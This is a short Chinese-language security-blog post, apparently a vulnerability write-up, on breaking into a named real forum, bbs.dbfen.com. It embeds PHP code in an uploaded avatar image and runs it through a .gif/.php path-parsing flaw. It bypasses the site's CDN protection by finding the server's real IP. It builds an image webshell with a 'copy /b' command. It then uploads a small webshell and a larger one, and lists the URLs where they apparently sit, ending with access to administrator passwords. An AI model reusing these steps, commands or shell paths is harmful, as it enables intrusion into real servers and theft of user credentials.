因是 论坛故存在上传. 通过头像上传处抓包二次渲染前的加入<php phpinfo();?>原图. http://bbs.dbfen.com/data/attachment/forum/201401/20/124804tkv7xu06npxs839v.gif/.php 通过phpinfo获取服务器真实IP. 改host绕过加速乐可上传并使用一句话. 论坛沦陷. 图片木马合成
E:\>copy 1.gif /b+ qiangda.php /b c.gif 1.gif qiangda.php
已复制 1 个文件。 传小马 http://bbs.dbfen.com/data/attachment/forum/201401/20/142927ubc80udjqrjbuoqm.gif/.php?id=cshell 小马传大马 http://bbs.dbfen.com/data/attachment/forum/201401/20/zip.php 通过论坛可查管理员密码, 主站岌岌可危. 但我都只是说说, 什么都没做. 真的. 😉 希望做云端的厂商更是一定要提高安全意识. |
-
上一篇: 中国联通wo用户密码重置 - 网站安全 - 自学php
下一篇: ThinkSNS一处任意文件包含 - 网站安全 - 自学php
还没有人抢沙发呢~